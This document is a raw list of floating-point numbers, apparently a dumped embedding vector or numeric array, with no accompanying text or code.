-0.03133279085159302, 0.007516064681112766, -0.005617227405309677, -0.019487855955958366, 0.015634683892130852, -0.017680194228887558, 0.01825103536248207, 0.0014627784257754683, -0.010608116164803505, 0.018409600481390953, -0.014683282002806664, 0.007405067794024944, -0.0045984359458088875, 0.005744080990552902, 0.00622374564409256, 0.012923191301524639, 0.008808383718132973, -0.004075165838003159, 0.015404760837554932, 0.0564497672021389, 0.0029156464152038097, 0.0017481985269114375, 0.012598128989338875, -0.004741146229207516, 0.0055617294274270535, -0.0006679624784737825, -0.0015817034291103482, -0.002057403791695833, -0.0105843311175704, 0.01733134686946869, 0.05549836903810501, -0.007853019051253796, -0.014207581989467144, 0.016142096370458603, 0.01610245555639267, -0.0013854771386831999, 0.014017301611602306, -0.015476115979254246, 0.001083209179341793, 0.01707763969898224, 0.005478481762111187, -0.015373047441244125, 0.007718237116932869, -0.015182767994701862, 0.026020806282758713, 0.02015383541584015, 0.0037243368569761515, -0.03992711007595062, -0.03437727317214012, -0.029303137212991714, -0.01929757557809353, -0.03583608940243721, -0.006116712931543589, 0.03380643576383591, -0.054356686770915985, -0.042464178055524826, 0.02489498257637024, -0.009910422377288342, -0.01570603810250759, 0.003466665977612138, -0.022104207426309586, -0.01910729520022869, 0.0007150369929149747, -0.020169692113995552, -0.03239519149065018, -0.011844937689602375, -0.005097921472042799, 0.011012461967766285, 0.003912635147571564, -0.020423399284482002, 0.0029751090332865715, -0.00952193420380354, 0.0665346160531044, -0.0050701722502708435, 0.02701977640390396, 0.02676606923341751, 0.004229768645018339, -0.03291846066713333, 0.02727348357439041, 0.039895396679639816, 0.016165882349014282, -0.03063509799540043, 0.048204295337200165, 0.014984559267759323, -0.014548500999808311, -0.014041086658835411, 0.006049321964383125, -0.007266322150826454, -0.0023903939872980118, -0.02227863110601902, 0.047348037362098694, 0.02732105366885662, -0.01167051400989294, -0.016919074580073357, 0.028351737186312675, -0.0508999302983284, 0.007872839458286762, -0.009823211468756199, -0.017759477719664574, 0.04078337177634239, -0.017759477719664574, -0.014944917522370815, -0.00034934241557493806, -0.005498302634805441, -0.012336494401097298, -0.010798396542668343, -0.02681363932788372, -0.042115334421396255, -0.007048292551189661, 0.007841126061975956, 0.004400227684527636, -0.019012155011296272, 0.024577848613262177, 0.009870780631899834, -0.021787073463201523, -0.009759784676134586, 0.007373354397714138, -0.018568167462944984, 0.007682559546083212, 0.01955128274857998, -0.011654657311737537, 0.02192978374660015, -0.029762981459498405, 0.021834643557667732, -0.029858121648430824, -0.011654657311737537, -0.000014416567864827812, 0.015388904139399529, -0.02126380242407322, -0.016966644674539566, 0.005462625063955784, 0.0327598936855793, -0.0006887743948027492, -0.00418219855055213, -0.015127269551157951, 0.01317689847201109, 0.0017481985269114375, 0.007468494586646557, 0.013113471679389477, 0.0010980748338624835, -0.008372325450181961, 0.032791607081890106, 0.043320439755916595, 0.034694407135248184, 0.012732910923659801, 0.0032387261744588614, -0.016070742160081863, 0.02001112513244152, 0.013327536173164845, 0.005399198271334171, -0.022611619904637337, 0.017569197341799736, 0.029921548441052437, -0.012423706240952015, 0.029318993911147118, -0.035962942987680435, -0.021533366292715073, 0.0031693531200289726, -0.004792680498212576, 0.008951094001531601, 0.013747738674283028, -0.052897874265909195, 0.032078057527542114, 0.0056846183724701405, -0.02806631661951542, 0.018330318853259087, 0.024831555783748627, -0.0017898223595693707, 0.0034091854467988014, -0.019012155011296272, 0.013589171692728996, 0.04620635509490967, -0.02706734649837017, -0.016062812879681587, 0.019646422937512398, -0.03916599228978157, 0.01894872821867466, -0.036724064499139786, -0.05296130105853081, -0.008372325450181961, 0.05223189294338226, -0.03053995966911316, -0.028510304167866707, -0.045730654150247574, 0.04037109762430191, -0.0102037712931633, -0.0229287538677454, 0.0018274820176884532, -0.017172779887914658, 0.03872200474143028, -0.05147077143192291, 0.0010019437177106738, 0.016522657126188278, -0.024783985689282417, 0.04217876121401787, 0.005331807304173708, -0.007000722456723452, 0.02993740513920784, 0.02248476631939411, 0.027606474235653877, 0.02695634961128235, -0.005565693601965904, -0.02408629097044468, 0.019773274660110474, -0.010536761954426765, 0.02449856512248516, 0.015262051485478878, -0.007250465452671051, 0.005260452628135681, -0.00641402555629611, -0.017363060265779495, -0.020978383719921112, 0.011480233632028103, 0.04062480479478836, 0.004463654477149248, 0.007793556433171034, -0.012756695970892906, 0.024720558896660805, -0.026892922818660736, 0.01774362102150917, -0.007004686631262302, 0.03865857794880867, -0.022294487804174423, 0.0047094328328967094, -0.027495477348566055, -0.04693576321005821, -0.056830327957868576, -0.012994546443223953, 0.011052103713154793, 0.004852143116295338, 0.033045314252376556, 0.05369070544838905, 0.0063149211928248405, 0.012986618094146252, -0.04655520245432854, -0.03796088322997093, -0.025814669206738472, 0.00031936337472870946, -0.022500623017549515, 0.04509638622403145, 0.0700865089893341, -0.005006745457649231, -0.02952513098716736, -0.00442401273176074, -0.004943318665027618, -0.01126616820693016, -0.008507107384502888, 0.01534926239401102, -0.021295515820384026, 0.008277185261249542, 0.03386986255645752, -0.017474057152867317, -0.022595763206481934, 0.0035796447191387415, -0.012003503739833832, -0.021279659122228622, -0.0209149569272995, 0.02505354955792427, 0.005446768365800381, -0.012376136146485806, -0.0007824279018677771, -0.011052103713154793, 0.039292845875024796, 0.01214621402323246, 0.033901575952768326, 0.0004952733870595694, -0.029192142188549042, 0.010021419264376163, -0.040339384227991104, -0.020502682775259018, -0.0315072163939476, 0.015341334044933319, 0.02942999079823494, -0.04763345792889595, 0.008237543515861034, 0.0045112245716154575, -0.014754637144505978, 0.0035598238464444876, -0.008951094001531601, 0.01098867692053318, 0.012796337716281414, 0.004816465545445681, -0.006913511082530022, 0.01204314548522234, 0.007765807211399078, -0.007012614980340004, -0.00836439710110426, 0.023610591888427734, -0.015928031876683235, -0.0025628353469073772, -0.037770602852106094, -0.013930090703070164, -0.0063902405090630054, 0.029953261837363243, -0.01287562120705843, 0.02177121676504612, 0.032331764698028564, -0.028859151527285576, -0.006540879141539335, -0.024720558896660805, -0.019820844754576683, -0.016459230333566666, -0.03805602341890335, -0.018013184890151024, -0.02565610222518444, 0.012027288787066936, -0.0031396220438182354, 0.021913927048444748, 0.008855953812599182, -0.02746376395225525, -0.015690181404352188, -0.014049015007913113, 0.02359473519027233, -0.01199557539075613, -0.0010881643975153565, -0.00505431555211544, 0.006608270108699799, 0.02600494958460331, -0.010283054783940315, -0.017267920076847076, -0.0013478174805641174, -0.003954258747398853, 0.015198624692857265, 0.011115530505776405, -0.009791498072445393, 0.00262626213952899, 0.001450885902158916, -0.012859764508903027, -0.0013626831350848079, -0.016395803540945053, 0.00126357888802886, -0.010639829561114311, 0.020788103342056274, -0.017727764323353767, 0.018758447840809822, 0.025338968262076378, 0.012883549556136131, -0.014849777333438396, -0.020550252869725227, -0.004860071465373039, -0.01980498805642128, 0.004725289531052113, 0.042717885226011276, -0.00041698102722875774, 0.02297632396221161, 0.024355854839086533, 0.017822904512286186, 0.016134168952703476, 0.03758032247424126, -0.004986924584954977, 0.012273067608475685, 0.009133446030318737, -0.012423706240952015, 0.003787763649597764, -0.02197735384106636, 0.012558488175272942, -0.0014825992984697223, -0.04094193875789642, -0.008356468752026558, 0.008197901770472527, -0.0007422906928695738, 0.007099826820194721, -0.004067237488925457, -0.030000831931829453, 0.008602246642112732, 0.004015703219920397, -0.011662585660815239, -0.03158649802207947, -0.026084233075380325, 0.005185133311897516, -0.001933523453772068, -0.002537068212404847, 0.01975741796195507, 0.010394051671028137, -0.016712937504053116, 0.0030127684585750103, 0.013795308768749237, -0.040593091398477554, -0.001017800415866077, -0.010655686259269714, 0.02021726220846176, 0.008388182148337364, -0.009569504298269749, 0.037263188511133194, -0.0320146307349205, -0.012344422750175, -0.0064259180799126625, 0.04103707894682884, -0.002031636657193303, -0.02782846800982952, 0.0297312680631876, -0.02479984238743782, -0.015301693230867386, -0.03329902142286301, -0.007702380418777466, 0.007908517494797707, -0.019218292087316513, -0.04087851196527481, 0.0199001282453537, -0.017807047814130783, 0.010600187815725803, 0.04252760484814644, -0.009284083731472492, 0.05166105180978775, 0.004059309139847755, 0.026877066120505333, 0.009395080618560314, -0.013279966078698635, -0.007464530412107706, -0.004285266622900963, -0.03599465638399124, 0.008427823893725872, -0.009006592445075512, 0.004416084382683039, 0.046238068491220474, 0.00486403563991189, -0.009355438873171806, -0.007523993030190468, -0.02413386106491089, 0.0018145984504371881, 0.028764011338353157, -0.01458814274519682, -0.06837398558855057, -0.04490610957145691, 0.014825992286205292, 0.051629338413476944, -0.021390656009316444, -0.0020732604898512363, 0.004832322243601084, 0.024561991915106773, -0.0029453777242451906, -0.018837731331586838, 0.021327229216694832, -0.015951815992593765, -0.004753038752824068, 0.011337523348629475, -0.01035440992563963, 0.007983836345374584, 0.008332683704793453, -0.03491640090942383, -0.03371129557490349, -0.00004599055682774633, 0.029953261837363243, 0.01073496975004673, -0.029762981459498405, 0.02892257831990719, 0.02151750959455967, 0.0005797597113996744, -0.02186635695397854, -0.017045926302671432, -0.02237377129495144, -0.0006748997839167714, -0.021596793085336685, 0.014707067050039768, 0.02711491659283638, -0.006207888945937157, 0.008285113610327244, -0.029953261837363243, 0.0005643985932692885, 0.0123523510992527, 0.014485074207186699, 0.02161264978349209, 0.01068739965558052, -0.012915262952446938, -0.015999386087059975, 0.0036787488497793674, 0.005688582547008991, 0.012463347986340523, 0.01769605092704296, 0.003991918172687292, -0.021089380607008934, -0.013414748013019562, 0.016823934391140938, -0.011385093443095684, 0.023356884717941284, 0.005351628176867962, -0.0014726888621225953, 0.0006233655731193721, -0.031824350357055664, 0.020724676549434662, -0.004669791087508202, -0.004408156033605337, 0.006786657497286797, -0.01936100237071514, -0.0012437580153346062, 0.0008721171761862934, 0.008237543515861034, 0.0199001282453537, -0.013121400028467178, -0.013938019052147865, 0.02359473519027233, -0.0010980748338624835, -0.0012655609752982855, -0.016443373635411263, 0.004804573021829128, -0.01171808410435915, -0.003656946122646332, 0.016617797315120697, 0.008189973421394825, -0.0008646844071336091, -0.0028284345753490925, -0.014580214396119118, 0.002150561660528183, 0.003660910064354539, 0.0052168467082083225, -0.012257210910320282, -0.020423399284482002, -0.007250465452671051, 0.001191232819110155, -0.0019315413665026426, -0.001756126875989139, -0.014603999443352222, -0.034345559775829315, -0.005958145949989557, 0.03393328934907913, 0.020423399284482002, 0.012407849542796612, -0.007983836345374584, 0.009609146043658257, -0.041703060269355774, -0.04560380056500435, 0.02489498257637024, 0.000883018656168133, 0.01088560838252306, 0.002911682240664959, -0.005220810882747173, -0.013057973235845566, -0.008974879048764706, 0.03517010807991028, -0.007087934296578169, 0.01899629831314087, -0.03291846066713333, -0.027558904141187668, -0.008816312067210674, -0.015055914409458637, 0.012138285674154758, 0.012526774778962135, -0.02605251967906952, 0.002541032386943698, 0.03821459040045738, -0.00009941392636392266, 0.021644363179802895, -0.016903217881917953, -0.012867692857980728, 0.00418219855055213, 0.0023388597182929516, -0.028209026902914047, 0.016490943729877472, 0.0017650462687015533, -0.0012060984736308455, -0.023071464151144028, 0.00039815122727304697, -0.01764848083257675, -0.024815699085593224, -0.0012556505389511585, 0.023071464151144028, -0.01255055982619524, 0.018266892060637474, -0.00218623923137784, 0.0014459306839853525, 0.0019047833047807217, -0.010750826448202133, -0.011781510896980762, 0.0398002564907074, 0.0005797597113996744, 0.004174270201474428, -0.014596071094274521, 0.001818562624976039, -0.0015678289346396923, -0.025576818734407425, -0.012820122763514519, -0.06837398558855057, 0.00792437419295311, 0.033647868782281876, -0.00904623419046402, 0.013089686632156372, -0.008197901770472527, 0.004079130012542009, 0.019535426050424576, 0.006120677106082439, -0.020185548812150955, 0.011591230519115925, -0.02695634961128235, -0.04179820045828819, -0.0076032765209674835, 0.034186992794275284, 0.02227863110601902, -0.009157231077551842, -0.011908364482223988, -0.012986618094146252, 0.04056137800216675, -0.00308610568754375, -0.026924636214971542, -0.02908114530146122, 0.0002530874335207045, -0.015365119092166424, 0.01818760856986046, -0.00051682855701074, 0.03180849179625511, -0.013121400028467178, 0.0043645501136779785, 0.01936100237071514, -0.019265862181782722, 0.03805602341890335, 0.004277338273823261, 0.011060032062232494, -0.023071464151144028, -0.013938019052147865, 0.028161456808447838, -0.02690877951681614, 0.013145185075700283, 0.03564580902457237, -0.018631594255566597, -0.0015499901492148638, -0.021580936387181282, 0.007702380418777466, 0.009236513637006283, 0.056766901165246964, -0.0009216692997142673, -0.006747015751898289, 0.004102915059775114, -0.008150331676006317, -0.003680730937048793, 0.005799579434096813, 0.028557874262332916, 0.013335464522242546, -0.018504740670323372, -0.024561991915106773, 0.025735385715961456, -0.04192505404353142, -0.012526774778962135, 0.0029929475858807564, -0.03891228511929512, 0.006219781469553709, -0.002126776846125722, -0.021438226103782654, 0.011789439246058464, 0.0031158369965851307, 0.034948114305734634, 0.021232089027762413, 0.03808773681521416, 0.013295822776854038, 0.009815283119678497, -0.01534926239401102, -0.0028601479716598988, 0.004788716323673725, 0.018457170575857162, 0.03119008243083954, -0.022738473489880562, 0.01925000548362732, 0.012598128989338875, -0.02711491659283638, -0.010806324891746044, 0.02035997249186039, 0.0010083855595439672, 0.014960774220526218, -0.02540239505469799, -0.013890448957681656, 0.017933901399374008, -0.010021419264376163, -0.037675462663173676, -0.0013666473096236587, -0.013779452070593834, -0.005355592351406813, -0.009751856327056885, -0.019028011709451675, -0.02020140551030636, -0.014263080433011055, 0.004297159146517515, -0.013137256726622581, 0.02468884550035, -0.021580936387181282, -0.006207888945937157, 0.0063902405090630054, -0.005855077877640724, 0.002156507922336459, -0.023864297196269035, -0.03234761953353882, 0.014889419078826904, -0.006929367780685425, 0.008800455369055271, -0.027432050555944443, 0.016697080805897713, 0.013065901584923267, 0.04776030778884888, 0.031316936016082764, -0.05759144946932793, -0.00014989514602348208, -0.0098311398178339, -0.017727764323353767, 0.020788103342056274, -0.018758447840809822, -0.014096585102379322, -0.019646422937512398, 0.011305809952318668, 0.008649816736578941, -0.0046618627384305, -0.015293764881789684, 0.02272261679172516, 0.008681530132889748, 0.01617380976676941, 0.007206859532743692, -0.004705468658357859, -0.03307702764868736, -0.007666702847927809, -0.022262774407863617, 0.02903357520699501, -0.024736415594816208, 0.03615322336554527, -0.008863882161676884, -0.01141680683940649, -0.03710462152957916, 0.022659189999103546, -0.013137256726622581, -0.015935959294438362, -0.011884579434990883, 0.0052366675809025764, 0.0007150369929149747, 0.014096585102379322, 0.004388335160911083, -0.02505354955792427, -0.0037084801588207483, 0.0015212498838081956, 0.03266475349664688, 0.0021783108823001385, -0.0031495322473347187, -0.008974879048764706, 0.01000556256622076, -0.020185548812150955, 0.02510111965239048, 0.04319358617067337, -0.0004192108754068613, -0.020375829190015793, -0.01672879420220852, 0.027479620650410652, -0.020248975604772568, -0.017664337530732155, -0.044430408626794815, -0.03821459040045738, -0.013636741787195206, -0.0036450535990297794, -0.014144155196845531, -0.008729100227355957, -0.007666702847927809, 0.02445099502801895, -0.02524382807314396, 0.006493309047073126, -0.0037045159842818975, 0.035804376006126404, -0.01890115812420845, 0.041829913854599, -0.017569197341799736, -0.014683282002806664, 0.005692546721547842, 0.028589587658643723, -0.028970148414373398, 0.039578262716531754, -0.027447907254099846, -0.01733134686946869, -0.027178343385457993, -0.017521627247333527, -0.020122122019529343, 0.027780897915363312, -0.00846746563911438, 0.02681363932788372, -0.010647757910192013, -0.021327229216694832, -0.020185548812150955, -0.019012155011296272, -0.00864188838750124, -0.03558238223195076, 0.012518846429884434, -0.027812611311674118, -0.010275126434862614, 0.003577662631869316, -0.017600910738110542, 0.02459370531141758, -0.0014023248804733157, 0.00016897270688787103, -0.004701504483819008, 0.012312709353864193, 0.03402842953801155, -0.03295017406344414, 0.037675462663173676, -0.010544690303504467, 0.02893843501806259, -0.023198317736387253, -0.0053952340967953205, -0.03220491111278534, -0.029572701081633568, -0.010433693416416645, -0.01068739965558052, -0.001983075635507703, -0.0006709356093779206, 0.004594471771270037, 0.02560853213071823, 0.027749184519052505, -0.016871504485607147, 0.02413386106491089, -0.041259072721004486, -0.0024637312162667513, 0.002515265252441168, 0.0058312928304076195, -0.0024637312162667513, 0.022944610565900803, -0.031824350357055664, -0.018647450953722, 0.044176701456308365, 0.037263188511133194, -0.013779452070593834, -0.011829080991446972, 0.01764848083257675, -0.01045747846364975, 0.01783876121044159, 0.02479984238743782, -0.005470553413033485, 0.023547165095806122, 0.014746708795428276, 0.030714381486177444, 0.016808077692985535, 0.015928031876683235, 0.011052103713154793, 0.010314768180251122, -0.004225804470479488, -0.03850001096725464, 0.014936989173293114, -0.014453360810875893, -0.019313432276248932, -0.00733371265232563, 0.024926695972681046, -0.000003348638983879937, -0.03764374926686287, -0.02852616086602211, -0.01176565419882536, 0.01297868974506855, 0.02500597946345806, 0.028304167091846466, 0.022040780633687973, 0.006152390502393246, 0.0040038106963038445, 0.01391423400491476, 0.064029261469841, -0.013311679475009441, -0.03044481948018074, -0.00719496700912714, 0.0136050283908844, 0.002277415245771408, 0.02475227229297161, -0.007967979647219181, -0.014278937131166458, -0.016760507598519325, -0.0004434914153534919, -0.0017571179196238518, 0.004685647785663605, -0.031982917338609695, -0.015317548997700214, 0.010980748571455479, 0.007615169044584036, 0.010092774406075478, 0.008959022350609303, -0.0026540111284703016, -0.013581243343651295, -0.012574344873428345, 0.008475393988192081, -0.018536454066634178, 0.023753302171826363, -0.025069406256079674, 0.0001450638083042577, -0.015491972677409649, 0.0008671620162203908, -0.01559504121541977, 0.028510304167866707, 0.011012461967766285, -0.05686204135417938, 0.010544690303504467, -0.00014320561604108661, -0.0011278061429038644, -0.01438993401825428, -0.021057667210698128, -0.022992180660367012, -0.0039047065656632185, -0.013731881976127625, -0.026036662980914116, -0.006417989730834961, -0.011369236744940281, 0.016601940616965294, 0.0690082535147667, 0.029445847496390343, -0.01829860545694828, -0.009490220807492733, -0.010663614608347416, -0.011646728962659836, -0.0025172473397105932, 0.009498149156570435, 0.008522963151335716, 0.007686523720622063, 0.020803960040211678, -0.015713965520262718, -0.006017608568072319, -0.010084846056997776, 0.00039567361818626523, -0.020930813625454903, 0.009807354770600796, -0.0068064783699810505, -0.017204493284225464, 0.002485533943399787, -0.013002474792301655, 0.0030841236002743244, 0.03773888945579529, -0.01582496240735054, -0.007543813902884722, -0.022706760093569756, 0.002200113842263818, -0.0052366675809025764, -0.024022864177823067, -0.016411660239100456, -0.008863882161676884, 0.0015371065819635987, 0.00656466418877244, 0.0011139315320178866, 0.017553340643644333, -0.00398597214370966, 0.04236903786659241, -0.0021723646204918623, 0.0034012570977211, -0.032791607081890106, 0.010401980020105839, 0.027447907254099846, -0.003823441220447421, -0.03336244821548462, 0.01088560838252306, -0.008887667208909988, 0.031269367784261703, 0.015452330932021141, 0.010148272849619389, -0.010061061009764671, -0.006374383810907602, -0.004348693415522575, -0.0020950634498149157, 0.030682668089866638, -0.009466435760259628, 0.0005534971132874489, 0.01758505403995514, 0.026639215648174286, -0.011892507784068584, -0.012471276335418224, -0.009133446030318737, -0.008911452256143093, 0.028209026902914047, 0.008800455369055271, 0.02272261679172516, -0.007504172157496214, -0.004459690302610397, 0.028700584545731544, 0.01267741248011589, 0.002101009711623192, 0.015745678916573524, -0.015531614422798157, -0.006164283026009798, -0.013589171692728996, 0.009212728589773178, 0.06380726397037506, -0.020280689001083374, -0.01151194702833891, -0.017363060265779495, -0.015975601971149445, 0.008800455369055271, 0.030524102970957756, -0.010877680033445358, 0.006556735839694738, -0.015999386087059975, -0.004554830491542816, 0.02318246103823185, -0.003964168950915337, -0.006798550020903349, -0.028716441243886948, -0.0015926049090921879, 0.0011595194227993488, 0.03567752242088318, 0.015618826262652874, -0.010235484689474106, -0.011916291899979115, -0.0023725552018731833, -0.00010957210906781256, 0.004055344965308905, -0.00922065693885088, 0.015190696343779564, 0.012820122763514519, 0.022817756980657578, -0.0037283010315150023, -0.011773582547903061, -0.008649816736578941, 0.03196705877780914, 0.01714106649160385, -0.011067960411310196, -0.006445738952606916, -0.013272037729620934, -0.008007621392607689, -0.03039724938571453, -0.03450412675738335, -0.005668761674314737, -0.03402842953801155, -0.006869905162602663, -0.003692623460665345, 0.0065924134105443954, -0.034948114305734634, -0.03453584015369415, -0.005375413224101067, 0.0173947736620903, 0.00836439710110426, -0.0038492081221193075, 0.0042416611686348915, -0.01584874838590622, -0.004174270201474428, 0.0027709542773663998, 0.02364230528473854, 0.025338968262076378, 0.012423706240952015, 0.018869444727897644, -0.008459537290036678, 0.030809521675109863, -0.011210670694708824, 0.03282332047820091, -0.013700168579816818, 0.017315490171313286, -0.006980901584029198, -0.015079699456691742, 0.028462734073400497, 0.007936266250908375, 0.04500124603509903, 0.033743008971214294, -0.01809246838092804, 0.008966950699687004, -0.013161041773855686, 0.014056943356990814, 0.012812194414436817, -0.01408865675330162, -0.01501627266407013, 0.010719113051891327, 0.03336244821548462, -0.004499332047998905, 0.0017353150760754943, -0.005676690023392439, -0.040846798568964005, -0.0036589279770851135, 0.020994240418076515, -0.010766683146357536, 0.01481806393712759, 0.013264110311865807, -0.012653627432882786, 0.021787073463201523, 0.02757476083934307, -0.012415777891874313, -0.04867999628186226, -0.019329288974404335, -0.009236513637006283, -0.00525252427905798, 0.0026381544303148985, -0.009077947586774826, -0.028637157753109932, 0.018647450953722, 0.0012318656081333756, -0.025180403143167496, -0.015365119092166424, 0.010790468193590641, 0.006140497978776693, -0.010552617721259594, 0.017474057152867317, -0.0136050283908844, -0.002140651224181056, 0.03637521713972092, -0.036819200962781906, 0.029715411365032196, -0.0034012570977211, -0.012661555781960487, 0.010251341387629509, 0.0204075425863266, 0.015365119092166424, -0.019345145672559738, -0.013438533060252666, -0.02197735384106636, -0.03250618651509285, 0.023055607452988625, -0.00588282709941268, 0.005288201384246349, 0.027812611311674118, -0.0024458924308419228, -0.007813377305865288, 0.006199960596859455, -0.0007972934981808066, 0.012661555781960487, -0.030920518562197685, -0.01113931555300951, 0.006909546907991171, -0.01194007694721222, 0.007436781190335751, -0.01677636429667473, -0.0025549069978296757, 0.011289953254163265, 0.006295100785791874, 0.009981777518987656, 0.02086738683283329, 0.009957992471754551, -0.020423399284482002, -0.013723953627049923, -0.0037758711259812117, -0.01683979108929634, 0.014072800055146217, -0.00904623419046402, 0.009807354770600796, -0.0045984359458088875, 0.009315797127783298, 0.024276571348309517, 0.01194007694721222, -0.008237543515861034, 0.004669791087508202, -0.004495367873460054, -0.008578461594879627, 0.05166105180978775, -0.020597822964191437, 0.018060754984617233, 0.0022278630640357733, -0.005058279726654291, -0.0019870398100465536, 0.007591383997350931, -0.03128522261977196, 0.002757079666480422, 0.019186578691005707, -0.011424735188484192, 0.0018641505157575011, -0.02651236392557621, -0.000233514336287044, -0.00029805596568621695, 0.031126655638217926, 0.016554370522499084, 0.004665826912969351, 0.0004965121624991298, 0.01890115812420845, -0.004776823800057173, -0.0046896119602024555, 0.0012318656081333756, 0.0005530015914700925, 0.0039483122527599335, -0.027083203196525574, 0.03239519149065018, -0.01477049384266138, 0.01229685265570879, 0.004729253705590963, -0.02061367966234684, 0.01774362102150917, -0.025735385715961456, 0.02641722373664379, -0.013565386645495892, -0.015579184517264366, 0.008071048185229301, 0.01844131387770176, -0.019868414849042892, 0.0008701351471245289, -0.0046341135166585445, 0.008031406439840794, -0.00797987263649702, 0.0002596530830487609, -0.005232703406363726, -0.031982917338609695, -0.03125350922346115, 0.004075165838003159, -0.00038477216730825603, 0.04300330579280853, 0.0005857059732079506, -0.015904245898127556, -0.022310344502329826, 0.010655686259269714, -0.00028740224661305547, -0.012693269178271294, -0.007952122949063778, -0.022167634218931198, 0.014001444913446903, 0.008871810510754585, -0.03301360085606575, -0.011202742345631123, 0.01825103536248207, -0.008221686817705631, -0.0267184991389513, 0.039990536868572235, -0.022167634218931198, -0.0037302831187844276, 0.009926279075443745, -0.009331653825938702, 0.027558904141187668, 0.007198931183665991, -0.0022595764603465796, 0.031316936016082764, -0.003876957343891263, -0.020233118906617165, 0.013731881976127625, -0.003472612239420414, 0.03951483592391014, -0.0199001282453537, -0.009918350726366043, -0.020803960040211678, 0.015618826262652874, -0.0003267962019890547, -0.006826299242675304, -0.012051073834300041, 0.004879892338067293, -0.034091852605342865, 0.040149103850126266, 0.004301123321056366, -0.004217876121401787, -0.023800872266292572, 0.0061920322477817535, -0.0033794541377574205, 0.011916291899979115, -0.0021366870496422052, -0.0033437765669077635, 0.004903677385300398, 0.005478481762111187, 0.023674018681049347, 0.004542937967926264, 0.0036054118536412716, 0.012360279448330402, 0.004063273314386606, -0.002122812671586871, 0.0026460827793926, 0.014247223734855652, -0.022801900282502174, -0.00884802546352148, 0.019487855955958366, -0.02035997249186039, 0.001940460759215057, 0.01688736118376255, -0.005074136424809694, 0.021390656009316444, 0.0072227162308990955, 0.0021644362714141607, -0.008459537290036678, -0.007686523720622063, -0.010013490915298462, -0.01293111965060234, -0.007290107198059559, 0.029144572094082832, 0.019567139446735382, 0.010528833605349064, 0.012273067608475685, -0.009006592445075512, -0.016316520050168037, -0.0069848657585680485, -0.009117589332163334, -0.010378194972872734, -0.00452311709523201, -0.022135920822620392, 0.015555399470031261, -0.01874259114265442, -0.012059002183377743, 0.01818760856986046, -0.015206553041934967, -0.020026981830596924, 0.022056637331843376, -0.004297159146517515, 0.03307702764868736, 0.009054162539541721, 0.019075581803917885, 0.03214148432016373, 0.011424735188484192, -0.03431384637951851, -0.001995959086343646, 0.013240325264632702, -0.009823211468756199, -0.014429575763642788, 0.005827328655868769, -0.01623723655939102, -0.012613985687494278, -0.007599312346428633, 0.015285836532711983, 0.008134474977850914, 0.002426071558147669, 0.017521627247333527, 0.021993210539221764, -0.009767713025212288, 0.03079366497695446, -0.008610174991190434, 0.00042565265903249383, 0.021232089027762413, 0.00216047209687531, -0.03095223195850849, 0.00369064137339592, 0.01366052683442831, 0.025989092886447906, 0.007282178848981857, 0.014294793829321861, 0.007476422935724258, -0.0003850199282169342, 0.02101009711623192, -0.04011739045381546, 0.028589587658643723, 0.017822904512286186, 0.011749797500669956, -0.005874898750334978, 0.008324755355715752, -0.019329288974404335, -0.022453054785728455, -0.0065170940943062305, -0.012907334603369236, -0.0008349530980922282, 0.012288924306631088, 0.026068376377224922, -0.005363520700484514, 0.01744234375655651, -0.02408629097044468, -0.027083203196525574, 0.00821375846862793, 0.003738211467862129, 0.019884271547198296, -0.020439255982637405, -0.007266322150826454, 0.01458814274519682, -0.006330777890980244, 0.030428962782025337, 0.024054577574133873, 0.028193170204758644, 0.0034745943266898394, -0.0018027059268206358, 0.003908670973032713, -0.0006327804876491427, 0.005537944380193949, -0.013264110311865807, 0.008189973421394825, -0.010068989358842373, 0.0023448059801012278, 0.002802667673677206, 0.009490220807492733, -0.021691933274269104, 0.01350988820195198, 0.0033933287486433983, -0.005030530504882336, -0.02005869522690773, 0.02651236392557621, 0.013200683519244194, -0.005958145949989557, 0.009173087775707245, 0.000653096882160753, -0.010956963524222374, 0.021945640444755554, 0.00909380428493023, -0.0040949867106974125, -0.014730852097272873, 0.018663307651877403, -0.011916291899979115, 0.020946670323610306, -0.006366455461829901, -0.0035102716647088528, 0.024466851726174355, 0.0016451302217319608, -0.0027709542773663998, -0.0010326660703867674, -0.03992711007595062, 0.017854617908596992, -0.0010237466776743531, 0.011210670694708824, -0.01171808410435915, -0.0027491513174027205, 0.01317689847201109, 0.000628816313110292, -0.010639829561114311, -0.0041861627250909805, 0.007056220900267363, -0.017727764323353767, 0.00758741982281208, -0.017854617908596992, -0.015769464895129204, 0.005478481762111187, 0.043574146926403046, 0.02616351656615734, 0.007738057989627123, 0.000851800839882344, 0.015238266438245773, 0.00010374973498983309, -0.013248253613710403, -0.003956240601837635, 0.017711907625198364, 0.00042813026811927557, 0.0028839330188930035, 0.0009300931706093252, -0.004122735932469368, 0.01182115264236927, -0.003397292923182249, -0.009712214581668377, -0.019012155011296272, 0.03222076594829559, -0.012027288787066936, 0.025560962036252022, -0.005086028948426247, -0.01698250137269497, 0.007765807211399078, 0.013977659866213799, -0.01769605092704296, 0.004017685540020466, 0.002130740787833929, 0.01522240974009037, 0.014611927792429924, -0.020248975604772568, -0.009212728589773178, -0.0028185241390019655, -0.0023448059801012278, -0.028161456808447838, 0.004990888759493828, 0.01642751693725586, -0.005847149528563023, -0.012788409367203712, -0.004642041865736246, 0.0046618627384305, -0.0075477780774235725, -0.01030683983117342, -0.013581243343651295, -0.0038690289948135614, -0.00221200636588037, 0.014263080433011055, -0.00782130565494299, -0.006596377585083246, -0.0023448059801012278, 0.006735123228281736, 0.006497273221611977, 0.006612234283238649, 0.00864188838750124, 0.010774611495435238, -0.004697540309280157, 0.00846746563911438, -0.0015737751964479685, -0.009236513637006283, 0.01929757557809353, 0.0049591753631830215, -0.0216760765761137, 0.01385873556137085, -0.024736415594816208, -0.007012614980340004, 0.005026566330343485, -0.021295515820384026, -0.017315490171313286, -0.017474057152867317, -0.024403424933552742, 0.001670897239819169, 0.0000804602459538728, 0.004340765066444874, 0.0004018676409032196, 0.009212728589773178, -0.004178234376013279, -0.007785628084093332, 0.009886637330055237, 0.015000415965914726, 0.006326813716441393, 0.01040990836918354, -0.005708403419703245, -0.0034389167558401823, 0.024879125878214836, -0.004313015844672918, -0.02156507968902588, 0.002451838692650199, 0.028906721621751785, -0.013383034616708755, 0.004015703219920397, -0.01628480665385723, 0.011488161981105804, -0.00568065419793129, 0.00140827102586627, 0.0014231366803869605, 0.0053595565259456635, 0.011504018679261208, -0.0034448630176484585, 0.0004851151898037642, 0.0030286251567304134, -0.009196871891617775, -0.001874060952104628, 0.0284785907715559, -0.009688429534435272, -0.019265862181782722, -0.012994546443223953, -0.008927308954298496, 0.0012487132335081697, -0.010972820222377777, -0.009743927977979183, 